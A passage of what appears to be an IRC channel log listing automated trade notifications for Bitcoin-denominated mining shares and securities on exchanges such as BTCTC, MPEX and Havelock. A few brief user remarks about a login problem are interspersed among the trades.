= 0.2474 BTC [+] Jul 30 11:44:48 [BTCTC] [ACTIVEMINING] 6 @ 0.008908 = 0.0534 BTC [-] Jul 30 11:44:54 [BTCTC] [ACTIVEMINING] 184 @ 0.009029 = 1.6613 BTC [+] Jul 30 11:46:16 [BTCTC] [ACTIVEMINING] 25 @ 0.009028 = 0.2257 BTC [-] Jul 30 11:46:59 [BTCTC] [ACTIVEMINING] 980 @ 0.009028 = 8.8474 BTC [-] Jul 30 11:48:07 [BTCTC] [TAT.MINIGAME] 1 @ 0.000286 BTC [+] Jul 30 11:48:25 [MPEX] [S.MPOE] 3650 @ 0.0008107 = 2.9591 BTC [+] Jul 30 11:53:11 [BTCTC] [TAT.MINIGAME] 5331 @ 0.000288 = 1.5353 BTC [+] Jul 30 11:53:13 [BTCTC] [TAT.MINIGAME] 2488 @ 0.000289 = 0.719 BTC [+] Jul 30 11:53:14 [BTCTC] [TAT.MINIGAME] 2996 @ 0.000295 = 0.8838 BTC [+] Jul 30 11:57:06 [BTCTC] [TAT.MINIGAME] 2000 @ 0.0003 = 0.6 BTC [+] Jul 30 11:57:08 [BTCTC] [TAT.MINIGAME] 5000 @ 0.0003033 = 1.5165 BTC [+] Jul 30 11:57:13 [MPEX] [S.MPOE] 10553 @ 0.00081076 = 8.556 BTC [+] Jul 30 12:01:42 [BTCTC] [ACTIVEMINING] 25 @ 0.008997 = 0.2249 BTC [-] Jul 30 12:02:50 [BTCTC] [ACTIVEMINING] 702 @ 0.008998 = 6.3166 BTC [+] Jul 30 12:07:57 [BTCTC] [TAT.MINIGAME] 1 @ 0.0003287 BTC [+] Jul 30 12:10:25 [BTCTC] [TAT.ASICMINER] 5 @ 0.043 = 0.215 BTC [-] Jul 30 12:10:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.0425 BTC [-] Jul 30 12:10:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0425 BTC [-] Jul 30 12:11:53 [BTCTC] [GSDPT] 30 @ 0.003353 = 0.1006 BTC [-] Jul 30 12:11:55 [BTCTC] [GSDPT] 93 @ 0.003352 = 0.3117 BTC [-] Jul 30 12:12:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [+] Jul 30 12:13:20 [BTCTC] [ACTIVEMINING] 50 @ 0.009 = 0.45 BTC [+] Jul 30 12:18:20 [BTCTC] [ACTIVEMINING] 165 @ 0.009 = 1.485 BTC [+] Jul 30 12:20:43 [BTCTC] [TAT.ASICMINER] 7 @ 0.04321 = 0.3025 BTC [+] Jul 30 12:24:28 [BTCTC] [ACTIVEMINING] 500 @ 0.009 = 4.5 BTC [+] Jul 30 12:25:05 [BTCTC] [ACTIVEMINING] 200 @ 0.009 = 1.8 BTC [+] Jul 30 12:31:23 [BTCTC] [ASICMINER-PT] 3 @ 4.447 = 13.341 BTC [-] Jul 30 12:35:45 [BTCTC] [ACTIVEMINING] 17 @ 0.009 = 0.153 BTC [+] Jul 30 12:42:54 [BTCTC] [TAT.MINIGAME] 299 @ 0.0003286 = 0.0983 BTC [-] Jul 30 12:42:56 [BTCTC] [TAT.MINIGAME] 499 @ 0.0003287 = 0.164 BTC [+] Jul 30 12:42:57 [BTCTC] [TAT.MINIGAME] 2790 @ 0.0003332 = 0.9296 BTC [+] Jul 30 12:42:58 [BTCTC] [TAT.MINIGAME] 120 @ 0.0003333 = 0.04 BTC [+] Jul 30 12:42:59 [BTCTC] [TAT.MINIGAME] 500 @ 0.0003489 = 0.1745 BTC [+] Jul 30 12:43:01 [BTCTC] [TAT.MINIGAME] 3800 @ 0.0003499 = 1.3296 BTC [+] Jul 30 12:43:02 [BTCTC] [TAT.MINIGAME] 10 @ 0.00035 = 0.0035 BTC [+] Jul 30 12:43:04 [BTCTC] [TAT.MINIGAME] 2000 @ 0.0003752 = 0.7504 BTC [+] Jul 30 12:43:05 [BTCTC] [TAT.MINIGAME] 32 @ 0.0003752 = 0.012 BTC [+] Jul 30 12:43:07 [BTCTC] [TAT.MINIGAME] 4844 @ 0.000397 = 1.9231 BTC [+] Jul 30 12:46:45 [BTCTC] [DMS.MINING] 1 @ 0.009896 BTC [+] Jul 30 12:49:17 [HAVELOCK] [AM100] 1 @ 0.0421799 BTC [+] Jul 30 12:49:30 Login Jul 30 12:50:22 doesn't work for me Jul 30 12:50:26 " The topic or board you are looking for appears to be either missing or off limits to you. " Jul 30 12:58:22 [BTCTC] [ESECURITYSABTC] 1 @ 0.3193 BTC [+] Jul 30 12:58:24 [BTCTC] [ESECURITYSABTC] 1 @ 0.3194 BTC [+] Jul 30 12:58:30 [BTCTC] [ESECURITYSABTC] 1 @ 0.31961 BTC [+] Jul 30 12:58:32 [BTCTC] [ESECURITYSABTC] 2 @ 0.325 = 0.65 BTC [+] Jul 30 12:59:47 [BTCTC] [TAT.MINIGAME] 20 @ 0.000398 = 0.008 BTC [+] Jul 30 12:59:49 [BTCTC] [TAT.MINIGAME] 147 @ 0.000398 = 0.0585 BTC [+] Jul 30 12:59:50 [BTCTC] [TAT.MINIGAME] 1632 @ 0.0003989 = 0.651 BTC [+] Jul 30 12:59:52 [BTCTC] [TAT.MINIGAME] 2500 @ 0.0004 = 1 BTC [+] Jul 30 13:05:40 [BTCTC] [ACTIVEMINING] 25 @ 0.008871 = 0.2218 BTC [-] Jul 30 13:05:42 [BTCTC] [ACTIVEMINING] 37 @ 0.00887 = 0.3282 BTC [-] Jul 30 13:05:43 [BTCTC] [ACTIVEMINING] 50 @ 0.008868 = 0.4434 BTC [-] Jul 30 13:05:45 [BTCTC] [ACTIVEMINING] 62 @ 0.00881 = 0.5462 BTC [-] Jul 30 13:05:46 [BTCTC] [ACTIVEMINING] 125 @ 0.008809 = 1.1011 BTC [-] Jul 30 13:07:16 [BTCTC] [PAJKA.BOND] 38 @ 0.0371 = 1.4098 BTC [-] Jul 30 13:07:18 [BTCTC] [PAJKA.BOND] 10 @ 0.03701 = 0.3701 BTC [-] Jul 30 13:07:20 [BTCTC] [PAJKA.BOND] 41 @ 0.03601 = 1.4764 BTC [-] Jul 30 13:08:05 [BTCTC] [PAJKA.BOND] 1 @ 0.036 BTC [-] Jul 30 13:08:18 [BTCTC] [ACTIVEMINING] 25 @ 0.008808 = 0.2202 BTC [-] Jul 30 13:08:27 [BTCTC] [PAJKA.BOND] 1 @ 0.035 BTC [-] Jul 30 13:08:30 [BTCTC] [PAJKA.BOND] 1 @ 0.03439 BTC [-] Jul 30 13:08:32 [BTCTC] [ACTIVEMINING] 1495 @ 0.008807 = 13.1665 BTC [-] Jul 30 13:08:36 [BTCTC] [PAJKA.BOND] 9 @ 0.0325 = 0.2925 BTC [-] Jul 30 13:08:37 [BTCTC] [ACTIVEMINING] 50 @ 0.008805 = 0.4403 BTC [-] Jul 30 13:08:45 [BTCTC] [TAT.MINIGAME] 1500 @ 0.0004001 = 0.6002 BTC [+] Jul 30 13:09:32 [BTCTC] [TAT.MINIGAME] 1377 @ 0.000401 = 0.5522 BTC [+] Jul 30 13:16:02 [BTCTC] [TAT.MINIGAME] 1890 @ 0.0004021 = 0.76 BTC [+] Jul 30 13:16:04 [BTCTC] [TAT.MINIGAME] 200 @ 0.0004098 = 0.082 BTC [+] Jul 30 13:16:15 [BTCTC] [TAT.MINIGAME] 10 @ 0.0004099 = 0.0041 BTC [+] Jul 30 13:16:17 [BTCTC] [TAT.MINIGAME] 4900 @ 0.00041 = 2.009 BTC [+] Jul 30 13:17:16 [BTCTC] [ACTIVEMINING] 35 @ 0.008995 = 0.3148 BTC [+] Jul 30 13:17:37 [BTCTC] [TAT.MINIGAME] 94 @ 0.00041 = 0.0385 BTC [+] Jul 30 13:19:26 [BTCTC] [ACTIVEMINING] 68 @ 0.008803 = 0.5986 BTC [-] Jul 30 13:20:30 [BTCTC] [TAT.MINIGAME] 1 @ 0.00042 BTC [+] Jul 30 13:20:39 [MPEX] [S.MPOE] 4640 @ 0.00081084 = 3.7623 BTC [+] Jul 30 13:20:40 [MPEX] [S.MPOE] 2710 @ 0.00081085 = 2.1974 BTC [+] Jul 30 13:21:19 [BTCTC] [TAT.ASICMINER] 41 @ 0.04225 = 1.7323 BTC [-] Jul 30 13:21:19 [BTCTC] [ACTIVEMINING] 400 @ 0.008803 = 3.5212 BTC [-] Jul 30 13:21:50 [BTCTC] [TAT.MINIGAME] 3 @ 0.0004285 = 0.0013 BTC [+] Jul 30 13:23:36 [BTCTC] [ACTIVEMINING] 1058 @ 0.008803 = 9.3136 BTC [-] Jul 30 13:23:38 [BTCTC] [ACTIVEMINING] 401 @ 0.008802 = 3.5296 BTC [-] Jul 30 13:23:40 [BTCTC] [ACTIVEMINING] 2515 @ 0.0088 = 22.132 BTC [-] Jul 30 13:24:23 [MPEX] [S.MPOE] 6450 @ 0.0008107 = 5.229 BTC [-] Jul 30 13:24:25 [MPEX] [S.MPOE] 8750 @ 0.0008104 = 7.091 BTC [-] Jul 30 13:24:38 [BTCTC] [ACTIVEMINING] 25 @ 0.008763 = 0.2191 BTC [-] Jul 30 13:24:40 [BTCTC] [ACTIVEMINING] 666 @ 0.008762 = 5.8355 BTC [-] Jul 30 13:25:07 [BTCTC] [ACTIVEMINING] 25 @ 0.008681 = 0.217 BTC [-] Jul 30 13:25:29 [BTCTC] [ACTIVEMINING] 230 @ 0.00868 = 1.9964 BTC [-] Jul 30 13:26:53 [BTCTC] [ACTIVEMINING] 60 @ 0.008763 = 0.5258 BTC [+] Jul 30 13:26:55 [BTCTC] [TAT.MINIGAME] 150 @ 0.00043 = 0.0645 BTC [+] Jul 30 13:27:35 [BTCTC] [TAT.MINIGAME] 350 @ 0.000415 = 0.1453 BTC [-] Jul 30 13:28:20 [BTCTC] [ASICMINER-PT] 1 @ 4.447 BTC [-] Jul 30 13:28:40 [BTCTC] [ACTIVEMINING] 25 @ 0.008891 = 0.2223 BTC [+] Jul 30 13:28:42 [BTCTC] [ACTIVEMINING] 5 @ 0.008892 = 0.0445 BTC [+] Jul 30 13:28:45 [BTCTC] [KENILWORTH] 140 @ 0.001712 = 0.2397 BTC [-] Jul 30 13:28:47 [BTCTC] [KENILWORTH] 1000 @ 0.001702 = 1.702 BTC [-] Jul 30 13:29:12 [BTCTC] [ACTIVEMINING] 4 @ 0.008891 = 0.0356 BTC [-] Jul 30 13:30:18 [BTCTC] [ASICMINER-PT] 1 @ 4.448 BTC [+] Jul 30 13:30:58 [BTCTC] [ACTIVEMINING] 25 @ 0.008891 = 0.2223 BTC [-] Jul 30 13:37:20 [BTCTC] [ACTIVEMINING] 25 @ 0.008885 = 0.2221 BTC [-] Jul 30 13:37:51 [BTCTC] [TAT.MINIGAME] 246 @ 0.0004 = 0.0984 BTC [-] Jul 30 13:41:27 [BTCTC] [TAT.MINIGAME] 3000 @ 0.000402 = 1.206 BTC [+] Jul 30 13:42:32 [BTCTC] [TAT.MINIGAME] 1 @ 0.000401 BTC [-] Jul 30 13:42:34 [BTCTC] [TAT.MINIGAME] 2253 @ 0.0004 = 0.9012 BTC [-] Jul 30 13:44:20 [BTCTC] [TAT.MINIGAME] 63 @ 0.00041 = 0.0258 BTC [+] Jul 30 13:44:28 [BTCTC] [TAT.MINIGAME] 1 @ 0.0004 BTC [-] Jul 30 13:44:30 [BTCTC] [TAT.MINIGAME] 7467 @ 0.00039 = 2.9121 BTC [-] Jul 30 13:47:51 [BTCTC] [ACTIVEMINING] 250 @ 0.00889 = 2.2225 BTC [+] Jul 30 13:48:49 [MPEX] [S.MPOE] 5100 @ 0.0008057 = 4.1091 BTC [-] Jul 30 13:48:51 [MPEX] [S.MPOE] 12500 @ 0.00080753 = 10.0941 BTC [+] Jul 30 13:50:47 [BTCTC] [ACTIVEMINING] 22 @ 0.008885 = 0.1955 BTC [-] Jul 30 13:51:23 [BTCTC] [ACTIVEMINING] 25 @ 0.008704 = 0.2176 BTC [-] Jul 30 13:51:25 [BTCTC] [ACTIVEMINING] 50 @ 0.008703 = 0.4352 BTC [-] Jul 30 13:51:27 [BTCTC] [ACTIVEMINING] 1 @ 0.008701 BTC [-] Jul 30 13:58:49 [BTCTC] [DMS.SELLING] 1 @ 0.02169 BTC [+] Jul 30 14:01:44 [BTCTC] [TAT.MINIGAME] 1 @ 0.000409 BTC [+] Jul 30 14:06:53 [BTCTC] [ASICMINER-PT] 1 @ 4.411 BTC [-] Jul 30 14:06:56 [BTCTC] [ASICMINER-PT] 7 @ 4.41 = 30.87 BTC [-] Jul 30 14:10:19 [BTCTC] [ACTIVEMINING] 1 @ 0.008798 BTC [+] Jul 30 14:10:22 [BTCTC] [ACTIVEMINING] 499 @ 0.008799 = 4.3907 BTC [+] Jul 30 14:17:22 [BTCTC] [ACTIVEMINING] 250 @ 0.008701 = 2.1753 BTC [-] Jul 30 14:17:24 [BTCTC] [ACTIVEMINING] 500 @ 0.0087 = 4.35 BTC [-] Jul 30 14:17:26 [BTCTC] [ACTIVEMINING] 185 @ 0.008681 = 1.606 BTC [-] Jul 30 14:17:28 [BTCTC] [ACTIVEMINING] 370 @ 0.00868 = 3.2116 BTC [-] Jul 30 14:17:28 [BTCTC] [ACTIVEMINING] 400 @ 0.0086 = 3.44 BTC [-] Jul 30 14:17:38 [BTCTC] [ACTIVEMINING] 1000 @ 0.00855 = 8.55 BTC [-] Jul 30 14:17:40 [BTCTC] [ACTIVEMINING] 200 @ 0.008515 = 1.703 BTC [-] Jul 30 14:17:42 [BTCTC] [ACTIVEMINING] 10 @ 0.0085 = 0.085 BTC [-] Jul 30 14:17:44 [BTCTC] [ACTIVEMINING] 500 @ 0.0085 = 4.25 BTC [-] Jul 30 14:17:46 [BTCTC] [ACTIVEMINING] 100 @ 0.0085 = 0.85 BTC [-] Jul 30 14:17:48 [BTCTC] [ACTIVEMINING] 60 @ 0.0085 = 0.51 BTC [-] Jul 30 14:18:24 [HAVELOCK] [AM100] 1 @ 0.042 BTC [-] Jul 30 14:19:33 [HAVELOCK] [AM100] 1 @ 0.042 BTC [-] Jul 30 14:20:25 [BTCTC] [ASICMINER-PT] 1 @ 4.411 BTC [+] Jul 30 14:20:27 [BTCTC] [ASICMINER-PT] 13 @ 4.41 = 57.33 BTC [-] Jul 30 14:26:30 [BTCTC] [ACTIVEMINING] 500 @ 0.0085 = 4.25 BTC [-] Jul 30 14:29:09 [MPEX] [S.MPOE] 11900 @ 0.00080753 = 9.6096 BTC [+] Jul 30 14:30:23 [MPEX] [S.MG] 172000 @ 0.00025 = 43 BTC [-] Jul 30 14:36:50 [MPEX] [S.MPOE] 10150 @ 0.00080753 = 8.1964 BTC [+] Jul 30 14:38:24 [BTCTC] [ACTIVEMINING] 25 @ 0.008501 = 0.2125 BTC [+] Jul 30 14:39:01 [BTCTC] [ACTIVEMINING] 50 @ 0.008502 = 0.4251 BTC [+] Jul 30 14:39:03 [BTCTC] [ACTIVEMINING] 10 @ 0.0085 = 0.085 BTC [-] Jul 30 14:39:06 [BTCTC] [ACTIVEMINING] 750 @ 0.008425 = 6.3188 BTC [-] Jul 30 14:39:08 [BTCTC] [ACTIVEMINING] 143 @ 0.008422 = 1.2043 BTC [-] Jul 30 14:39:10 [BTCTC] [ACTIVEMINING] 19 @ 0.0084 = 0.1596 BTC [-] Jul 30 14:40:19 [BTCTC] [ACTIVEMINING] 21 @ 0.0084 = 0.1764 BTC [-] Jul 30 14:40:23 [BTCTC] [ACTIVEMINING] 1500 @ 0.0083 = 12.45 BTC [-] Jul 30 14:40:49 [BTCTC] [ACTIVEMINING] 25 @ 0.008211 = 0.2053 BTC [-] Jul 30 14:41:04 [BTCTC] [ACTIVEMINING] 100 @ 0.00821 = 0.821 BTC [-] Jul 30 14:41:08 [BTCTC] [ACTIVEMINING] 600 @ 0.0082 = 4.92 BTC [-] Jul 30 14:41:10 [BTCTC] [ACTIVEMINING] 30 @ 0.008123 = 0.2437 BTC [-] Jul 30 14:41:14 [BTCTC] [ACTIVEMINING] 3975 @ 0.008123 = 32.2889 BTC [-] Jul 30 14:42:45 [BTCTC] [TAT.MINIGAME] 1 @ 0.000391 BTC [-] Jul 30 14:43:07 [BTCTC] [ACTIVEMINING] 25 @ 0.008124 = 0.2031 BTC [+] Jul 30 14:43:09 [BTCTC] [ACTIVEMINING] 25 @ 0.008123 = 0.2031 BTC [-] Jul 30 14:43:11 [BTCTC] [ACTIVEMINING] 500 @ 0.00805 = 4.025 BTC [-] Jul 30 14:43:13 [BTCTC] [ACTIVEMINING] 30 @ 0.008008 = 0.2402 BTC [-] Jul 30 14:43:13 [BTCTC] [ACTIVEMINING] 100 @ 0.008002 = 0.8002 BTC [-] Jul 30 14:43:15 [BTCTC] [ACTIVEMINING] 2 @ 0.008002 = 0.016 BTC [-] Jul 30 14:43:16 [BTCTC] [ACTIVEMINING] 200 @ 0.008002 = 1.6004 BTC [-] Jul 30 14:43:18 [BTCTC] [ACTIVEMINING] 3300 @ 0.008002 = 26.4066 BTC [-] Jul 30 14:43:32 [BTCTC] [BASIC-MINING] 1 @ 0.4434 BTC [-] Jul 30 14:43:34 [BTCTC] [BASIC-MINING] 3 @ 0.4433 = 1.3299 BTC [-] Jul 30 14:43:36 [BTCTC] [BASIC-MINING] 1 @ 0.4433 BTC [-] Jul 30 14:43:37 [BTCTC] [BASIC-MINING] 1 @ 0.4412 BTC [-] Jul 30 14:43:39 [BTCTC] [BASIC-MINING] 2 @ 0.4411 = 0.8822 BTC [-] Jul 30 14:44:12 [BTCTC] [ACTIVEMINING] 650 @ 0.008124 = 5.2806 BTC [+] Jul 30 14:44:38 [BTCTC] [ACTIVEMINING] 375 @ 0.008124 = 3.0465 BTC [+] Jul 30 14:44:40 [BTCTC] [ACTIVEMINING] 3 @ 0.008001 = 0.024 BTC [-] Jul 30 14:44:42 [BTCTC] [ACTIVEMINING] 1697 @ 0.008001 = 13.5777 BTC [-] Jul 30 14:45:21 [BTCTC] [ACTIVEMINING] 400 @ 0.008002 = 3.2008 BTC [+] Jul 30 14:45:22 [BTCTC] [TAT.MINIGAME] 13 @ 0.00039 = 0.0051 BTC [-] Jul 30 14:45:24 [BTCTC] [ACTIVEMINING] 600 @ 0.008001 = 4.8006 BTC [-] Jul 30 14:45:46 [BTCTC] [ACTIVEMINING] 1703 @ 0.008001 = 13.6257 BTC [-] Jul 30 14:45:48 [BTCTC] [ACTIVEMINING] 25 @ 0.008 = 0.2 BTC [-] Jul 30 14:45:50 [BTCTC] [ACTIVEMINING] 1000 @ 0.008 = 8 BTC [-] Jul 30 14:45:52 [BTCTC] [ACTIVEMINING] 1000 @ 0.008 = 8 BTC [-] Jul 30 14:45:53 [BTCTC] [ACTIVEMINING] 415 @ 0.008 = 3.32 BTC [-] Jul 30 14:45:54 [BTCTC] [ACTIVEMINING] 520 @ 0.008 = 4.16 BTC [-] Jul 30 14:45:56 [BTCTC] [ACTIVEMINING] 100 @ 0.008 = 0.8 BTC [-] Jul 30 14:45:58 [BTCTC] [ACTIVEMINING] 3000 @ 0.008 = 24 BTC [-] Jul 30 14:46:17 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.002379 = 0.0048 BTC [-] Jul 30 14:46:48 [BTCTC] [ACTIVEMINING] 10 @ 0.007999 = 0.08 BTC [-] Jul 30 14:46:50 [BTCTC] [ACTIVEMINING] 250 @ 0.007877 = 1.9693 BTC [-] Jul 30 14:46:54 [BTCTC] [ACTIVEMINING] 1 @ 0.0078 BTC [-] Jul 30 14:46:56 [BTCTC] [ACTIVEMINING] 200 @ 0.007603 = 1.5206 BTC [-] Jul 30 14:46:57 [BTCTC] [ASICMINER-PT] 1 @ 4.402 BTC [-] Jul 30 14:46:59 [BTCTC] [ACTIVEMINING] 1 @ 0.0076 BTC [-] Jul 30 14:47:35 [BTCTC] [ACTIVEMINING] 5 @ 0.00756 = 0.0378 BTC [-] Jul 30 14:47:36 [BTCTC] [BASIC-MINING] 1 @ 0.4411 BTC [-] Jul 30 14:47:37 [BTCTC] [ACTIVEMINING] 172 @ 0.00755 = 1.2986 BTC [-] Jul 30 14:47:39 [BTCTC] [BASIC-MINING] 3 @ 0.4411 = 1.3233 BTC [-] Jul 30 14:47:40 [BTCTC] [ACTIVEMINING] 100 @ 0.007504 = 0.7504 BTC [-] Jul 30 14:47:41 [BTCTC] [BASIC-MINING] 1 @ 0.44 BTC [-] Jul 30 14:47:43 [BTCTC] [BASIC-MINING] 1 @ 0.4222 BTC [-] Jul 30 14:47:44 [BTCTC] [ACTIVEMINING] 100 @ 0.0075 = 0.75 BTC [-] Jul 30 14:47:46 [BTCTC] [ACTIVEMINING] 150 @ 0.0075 = 1.125 BTC [-] Jul 30 14:47:47 [BTCTC] [ACTIVEMINING] 36 @ 0.0075 = 0.27 BTC [-] Jul 30 14:48:49 [BTCTC] [ACTIVEMINING] 500 @ 0.007501 = 3.7505 BTC [+] Jul 30 14:48:51 [BTCTC] [BASIC-MINING] 12 @ 0.4221 = 5.0652 BTC [-] Jul 30 14:48:52 [BTCTC] [BASIC-MINING] 1 @ 0.42 BTC [-] Jul 30 14:48:55 [BTCTC] [BASIC-MINING] 4 @ 0.4111 = 1.6444 BTC [-] Jul 30 14:49:10 [BTCTC] [ASICMINER-PT] 1 @ 4.402 BTC [-] Jul 30 14:49:29 [BTCTC] [DMS.MINING] 2 @ 0.00911 = 0.0182 BTC [-] Jul 30 14:50:27 [BTCTC] [ACTIVEMINING] 500 @ 0.0077 = 3.85 BTC [+] Jul 30 14:51:55 Damn Jul 30 14:54:15 [BTCTC] [TAT.MINIGAME] 2 @ 0.00039 = 0.0008 BTC [-] Jul 30 14:57:58 [MPEX] [S.MG] 25000 @ 0.0002675 = 6.6875 BTC [+] Jul 30 14:58:49 [BTCTC] [TAT.MINIGAME] 2518 @ 0.00039 = 0.982 BTC [-] Jul 30 14:58:51 [BTCTC] [TAT.MINIGAME] 2983 @ 0.0003345 = 0.9978 BTC [-] Jul 30 14:58:53 [BTCTC] [TAT.MINIGAME] 4150 @ 0.0003344 = 1.3878 BTC [-] Jul 30 14:58:55 [BTCTC] [TAT.MINIGAME] 130 @ 0.0003342 = 0.0434 BTC [-] Jul 30 14:58:57 [BTCTC] [TAT.MINIGAME] 10000 @ 0.000334 = 3.34 BTC [-] Jul 30 14:58:59 [BTCTC] [TAT.MINIGAME] 8600 @ 0.0003288 = 2.8277 BTC [-] Jul 30 14:59:01 [BTCTC] [TAT.MINIGAME] 1 @ 0.000314 BTC [-] Jul 30 15:01:00 [BTCTC] [DMS.MINING] 113 @ 0.00911 = 1.0294 BTC [-] Jul 30 15:06:36 [HAVELOCK] [HIM] 1 @ 0.181 BTC [-] Jul 30 15:16:37 [BTCTC] [ACTIVEMINING] 37 @ 0.00838 = 0.3101 BTC [+] Jul 30 15:17:22 [BTCTC] [BASIC-MINING] 1 @ 0.4677 BTC [+] Jul 30 15:17:31 [HAVELOCK] [AM100] 12 @ 0.041 = 0.492 BTC [-] Jul 30 15:17:45 [HAVELOCK] [AM100] 95 @ 0.0404 = 3.838 BTC [-] Jul 30 15:17:52 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] Jul 30 15:17:59 [HAVELOCK] [AM100] 70 @ 0.0403001 = 2.821 BTC [-] Jul 30 15:18:30 [HAVELOCK] [AM100] 118 @ 0.0403001 = 4.7554 BTC [-] Jul 30 15:18:50 [HAVELOCK] [AM100] 2 @ 0.0403 = 0.0806 BTC [-] Jul 30 15:19:17 [HAVELOCK] [AM100] 1 @ 0.04020001 BTC [-] Jul 30 15:20:37 [BTCTC] [BASIC-MINING] 1 @ 0.4676 BTC [-] Jul 30 15:20:39 [BTCTC] [BASIC-MINING] 3 @ 0.4677 = 1.4031 BTC [+] Jul 30 15:20:46 [HAVELOCK] [AM100] 85 @ 0.0403 = 3.4255 BTC [+] Jul 30 15:20:49 [HAVELOCK] [AM100] 215 @ 0.04020001 = 8.643 BTC [-] Jul 30 15:21:39 [HAVELOCK] [AM100] 118 @ 0.04020001 = 4.7436 BTC [-] Jul 30 15:21:46 [BTCTC] [GSDPT] 1000 @ 0.003352 = 3.352 BTC [-] Jul 30 15:21:55 [HAVELOCK] [AM100] 30 @ 0.04010001 = 1.203 BTC [-] Jul 30 15:22:40 [BTCTC] [GSDPT] 10000 @ 0.003352 = 33.52 BTC [-] Jul 30 15:22:55 [HAVELOCK] [AM100] 2 @ 0.04010001 = 0.0802 BTC [-] Jul 30 15:23:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.0432 = 0.1296 BTC [+] Jul 30 15:24:16 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.002379 = 0.019 BTC [-] Jul 30 15:24:33 [BTCTC] [GSDPT] 6481 @ 0.003352 = 21.7243 BTC [-] Jul 30 15:26:00 [BTCTC] [ACTIVEMINING] 125 @ 0.008201 = 1.0251 BTC [-] Jul 30 15:26:03 [BTCTC] [ACTIVEMINING] 700 @ 0.0082 = 5.74 BTC [-] Jul 30 15:26:28 [BTCTC] [ACTIVEMINING] 25 @ 0.008199 = 0.205 BTC [-] Jul 30 15:26:30 [BTCTC] [ACTIVEMINING] 139 @ 0.0082 = 1.1398 BTC [+] Jul 30 15:26:56 [BTCTC] [TAT.MINIGAME] 1000 @ 0.00029 = 0.29 BTC [-] Jul 30 15:26:59 [BTCTC] [TAT.MINIGAME] 2000 @ 0.000288 = 0.576 BTC [-] Jul 30 15:27:01 [BTCTC] [TAT.MINIGAME] 1000 @ 0.000281 = 0.281 BTC [-] Jul 30 15:29:44 [BTCTC] [BASIC-MINING] 4 @ 0.411 = 1.644 BTC [-] Jul 30 15:30:42 [HAVELOCK] [AM100] 10 @ 0.04010001 = 0.401 BTC [-] Jul 30 15:31:26 [HAVELOCK] [VTX] 2 @ 0.492 = 0.984 BTC [-] Jul 30 15:31:48 [HAVELOCK] [VTX] 1 @ 0.4912 BTC [-] Jul 30 15:32:23 [HAVELOCK] [AM1] 1 @ 4.579 BTC [-] Jul 30 15:33:00 [HAVELOCK] [SDSTM] 36 @ 0.00899848 = 0.3239 BTC [+] Jul 30 15:34:43 [BTCTC] [DMS.MINING] 2 @ 0.009111 = 0.0182 BTC [+] Jul 30 15:35:11 [BTCTC] [ACTIVEMINING] 25 @ 0.008397 = 0.2099 BTC [+] Jul 30 15:36:17 [BTCTC] [ACTIVEMINING] 11 @ 0.008394 = 0.0923 BTC [-] Jul 30 15:36:36 [BTCTC] [ACTIVEMINING] 25 @ 0.008393 = 0.2098 BTC [-] Jul 30 15:36:38 [BTCTC] [ACTIVEMINING] 475 @ 0.008394 = 3.9872 BTC [+] Jul 30 15:37:27 [BTCTC] [DMS.MINING] 81 @ 0.00911 = 0.7379 BTC [-] Jul 30 15:37:57 [MPEX] [S.MPOE] 12200 @ 0.00080519 = 9.8233 BTC [-] Jul 30 15:38:19 [BTCTC] [RSM] 1 @ 0.01383 BTC [-] Jul 30 15:38:45 [BTCTC] [RSM] 23 @ 0.01382 = 0.3179 BTC [-] Jul 30 15:38:47 [BTCTC] [ACTIVEMINING] 25 @ 0.008201 = 0.205 BTC [-] Jul 30 15:38:47 [BTCTC] [RSM] 15 @ 0.01382 = 0.2073 BTC [-] Jul 30 15:38:49 [BTCTC] [ACTIVEMINING] 500 @ 0.0082 = 4.1 BTC [-] Jul 30 15:38:51 [BTCTC] [ACTIVEMINING] 7 @ 0.008011 = 0.0561 BTC [-] Jul 30 15:38:53 [BTCTC] [ACTIVEMINING] 2 @ 0.008009 = 0.016 BTC [-] Jul 30 15:38:55 [BTCTC] [ACTIVEMINING] 800 @ 0.008008 = 6.4064 BTC [-] Jul 30 15:38:57 [BTCTC] [ACTIVEMINING] 750 @ 0.008 = 6 BTC [-] Jul 30 15:39:00 [BTCTC] [ACTIVEMINING] 600 @ 0.008 = 4.8 BTC [-] Jul 30 15:39:02 [BTCTC] [ACTIVEMINING] 100 @ 0.008 = 0.8 BTC [-] Jul 30 15:39:04 [BTCTC] [ACTIVEMINING] 1500 @ 0.008 = 12 BTC [-] Jul 30 15:39:09 [BTCTC] [RSM] 12 @ 0.01381 = 0.1657 BTC [-] Jul 30 15:40:32 [BTCTC] [TAT.ASICMINER] 16 @ 0.04319 = 0.691 BTC [-] Jul 30 15:46:20 [BTCTC] [ACTIVEMINING] 25 @ 0.00791 = 0.1978 BTC [-] Jul 30 15:46:24 [BTCTC] [ACTIVEMINING] 300 @ 0.007909 = 2.3727 BTC [-] Jul 30 15:46:26 [BTCTC] [ACTIVEMINING] 677 @ 0.007902 = 5.3497 BTC [-] Jul 30 15:49:35 [HAVELOCK] [AM100] 1 @ 0.042 BTC [+] Jul 30 15:51:45 [BTCTC] [ACTIVEMINING] 3 @ 0.008129 = 0.0244 BTC [+] Jul 30 15:52:37 [BTCTC] [TAT.VIRTUALMINE] 90 @ 0.002379 = 0.2141 BTC [-] Jul 30 15:52:39 [BTCTC] [TAT.VIRTUALMINE] 250 @ 0.00238 = 0.595 BTC [+] Jul 30 15:52:40 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.002386 = 0.0167 BTC [+] Jul 30 15:52:42 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.002688 = 0.0134 BTC [+] Jul 30 15:52:43 [BTCTC] [TAT.VIRTUALMINE] 16 @ 0.002689 = 0.043 BTC [+] Jul 30 15:52:45 [BTCTC] [TAT.VIRTUALMINE] 150 @ 0.002699 = 0.4049 BTC [+] Jul 30 15:52:46 [BTCTC] [TAT.VIRTUALMINE] 102 @ 0.002699 = 0.2753 BTC [+] Jul 30 15:53:13 [HAVELOCK] [AM100] 1 @ 0.042 BTC [+] Jul 30 15:54:28 [MPEX] [S.MPOE] 1350 @ 0.00080519 = 1.087 BTC [-] Jul 30 15:54:29 [MPEX] [S.MPOE] 12629 @ 0.00080323 = 10.144 BTC [-] Jul 30 15:56:14 